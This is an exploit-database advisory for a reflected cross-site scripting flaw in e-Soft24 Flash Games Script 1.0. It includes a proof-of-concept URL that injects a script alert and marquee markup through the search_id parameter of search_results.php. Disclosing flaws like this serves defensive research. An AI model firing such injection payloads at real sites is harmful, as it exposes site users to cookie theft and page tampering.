e-Soft24 Flash Games Script 1.0 - Cross-Site Scripting Vulnerability

2009-08-30T00:00:00
ID EDB-ID:34650
Type exploitdb
Reporter 599eme Man
Modified 2009-08-30T00:00:00

Description

e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/43297/info

e-Soft24 Flash Games Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

e-Soft24 Flash Games Script 1.0 is vulnerable; other versions may also be affected. 

http://www.example.com/search_results.php?search_id='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&search=Search